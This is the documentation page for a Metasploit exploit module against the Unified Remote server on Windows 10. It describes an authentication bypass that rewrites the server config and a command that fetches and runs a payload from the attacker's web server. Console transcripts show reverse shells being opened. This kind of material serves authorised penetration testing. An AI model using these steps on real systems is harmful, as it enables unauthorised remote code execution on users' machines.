metasploit-gs/documentation/modules/exploit/windows/misc/unified_remote_rce.md

## Vulnerable Application

This module utilizes the Unified Remote remote control protocol to type out and
deploy a payload.  The remote control protocol can be configured to have no passwords,
a group password, or individual user accounts.  If the web page is accessible, the
access control is set to no password for exploitation, then reverted.
If the web page is not accessible, exploitation will be tried blindly.

This module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.

There are two methods to run a payload:

1. push method. This method pushes the payload (as if you were typing it) to the prompt. If you have a
very small payload, or are just running a simple command, this would be fine.  However, since we are running
a binary payload which has been base64 encoded, this method usually took minutes to complete. Since Windows
needs to be unlocked, the assumption is a user is there, and watching a payload be typed on the screen for minutes
seemed unacceptable. Also, if the user clicks the mouse or hits a key on the keyboard, the payload will not finish
or corrupt. This method was pulled from the final module as it didn't seem likely to succeed and was not feasbile
outside of a testing environment.
2. pull method. This method starts a web server on the Metasploit host, and types out the command to pull and
execute the payload. Since the URL is typically short, this method proved to be reliable and quick.

Version 3.11.0.2483 can be downloaded from
[unifiedremote.com](https://www.unifiedremote.com/static/builds/server/windows-x86/2483/ServerSetup-3.11.0.2483.exe)

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/windows/misc/unified_remote_rce`
4. Set `rhost` and `lhost` as required.
5. Do: `run`
6. You should get a shell.

## Options


### WEBSERVER

The port the web server is running on.  Defaults to `9510`

### CLIENTNAME

The name of the client device to use.  This shows up in the Unified Remote logs. If empty
A random android based name is chosen. Defaults to ``

### SLEEP

The length of time to sleep between each command, this gives the remote program time to process the command on screen.
Defaults to `1` second.

### PATH

Where to temporarily store the payload.  Defaults to `c:\\Windows\\Temp\\`

### VISIBLE

If set to `true`, uses a 'standard' method of typing to the screen. If set to `false`
utilizes a 'pro' feature of unified remote to execute a script in the background.
Defaults to `false`

## Scenarios

### Version 3.11.0.2483 on Windows 10, No authentication, visible false

```
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] 2.2.2.2:9512 - Client name set to: android-ASvxWyO708Rv4x0j
[*] 2.2.2.2:9512 - Retrieving server config
[+] 2.2.2.2:9512 - No security enabled
[+] 2.2.2.2:9512 - Found account: admin
[+] 2.2.2.2:9512 - Found account: wheres
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Loading Unified.Command
[*] 2.2.2.2:9512 - Updating Unified.Command
[*] 2.2.2.2:9512 - Sending payload
[*] 2.2.2.2:9512 - Executing script
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50052) at 2022-09-18 19:00:33 -0400
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\U4culUYTuG.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\ProgramData\Unified Remote\Remotes\Bundled\Unified\Main\Command>
```

### Version 3.11.0.2483 on Windows 10, No authentication, visible true

```
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] 2.2.2.2:9512 - Client name set to: android-s5IbpVuRf1MJzqRs
[*] 2.2.2.2:9512 - Retrieving server config
[+] 2.2.2.2:9512 - No security enabled
[+] 2.2.2.2:9512 - Found account: admin
[+] 2.2.2.2:9512 - Found account: wheres
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Opening Start Menu
[*] 2.2.2.2:9512 - Opening command prompt
[*] 2.2.2.2:9512 - Typing out payload
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Attempting to open payload
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:59233) at 2022-09-08 16:47:20 -0400
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\jhy5cTqRs.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\Users\windows>whoami
whoami
win10prolicense\windows

C:\Users\windows>systeminfo
systeminfo

Host Name:                 WIN10PROLICENSE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299
```

### Version 3.11.0.2483 on Windows 10, group authentication, visible true

```
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] 2.2.2.2:9512 - Client name set to: android-ergZhp49nDBmGXz8
[*] 2.2.2.2:9512 - Retrieving server config
[*] 2.2.2.2:9512 - anonymous mode enabled, password required, bypassing
[*] 2.2.2.2:9512 - Uploading new server config
[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
[+] 2.2.2.2:9512 - Found account: admin
[+] 2.2.2.2:9512 - Found account: wheres
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Opening Start Menu
[*] 2.2.2.2:9512 - Opening command prompt
[*] 2.2.2.2:9512 - Typing out payload
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Attempting to open payload
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] 2.2.2.2:9512 - Reverting security mode
[*] 2.2.2.2:9512 - Uploading new server config
[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:59596) at 2022-09-08 16:50:21 -0400
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\lqVUQTKtxuSD1mm.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\Users\windows>
```

### Version 3.11.0.2483 on Windows 10, user authentication, visible true

```
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] 2.2.2.2:9512 - Client name set to: android-Mmw9X2FSLLPzJk6t
[*] 2.2.2.2:9512 - Retrieving server config
[*] 2.2.2.2:9512 - users mode enabled, password required, bypassing
[*] 2.2.2.2:9512 - Uploading new server config
[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
[+] 2.2.2.2:9512 - Found account: admin
[+] 2.2.2.2:9512 - Found account: wheres
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Opening Start Menu
[*] 2.2.2.2:9512 - Opening command prompt
[*] 2.2.2.2:9512 - Typing out payload
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Attempting to open payload
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] 2.2.2.2:9512 - Reverting security mode
[*] 2.2.2.2:9512 - Uploading new server config
[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:59932) at 2022-09-08 16:53:05 -0400
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\2NzuxPbY6fGK9FdNy.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\Users\windows>
```

### Version 3.11.0.2483 on Windows 10, no authentication, no web server access, visible true

```
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] 2.2.2.2:9512 - Client name set to: android-EIC1Bc3pwL4U4Pnj
[*] 2.2.2.2:9512 - Retrieving server config
[-] 2.2.2.2:9512 - Web interface is disabled. Unable to attempt bypass, assuming no authentication.
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Opening Start Menu
[*] 2.2.2.2:9512 - Opening command prompt
[*] 2.2.2.2:9512 - Typing out payload
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Attempting to open payload
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:60829) at 2022-09-08 17:00:30 -0400
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\QD7V9rLaWUwvPIY.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\Users\windows>
```

### Version 3.11.0.2483 on Windows 10, user authentication, no web server access, visible true

This will fail.

```
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] 2.2.2.2:9512 - Client name set to: android-iJP3rW13dKjtf8Xz
[*] 2.2.2.2:9512 - Retrieving server config
[-] 2.2.2.2:9512 - Web interface is disabled. Unable to attempt bypass, assuming no authentication.
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Opening Start Menu
[*] 2.2.2.2:9512 - Opening command prompt
[*] 2.2.2.2:9512 - Typing out payload
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Attempting to open payload
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\tapEZnGskY.exe' on the target
[*] Exploit completed, but no session was created.
```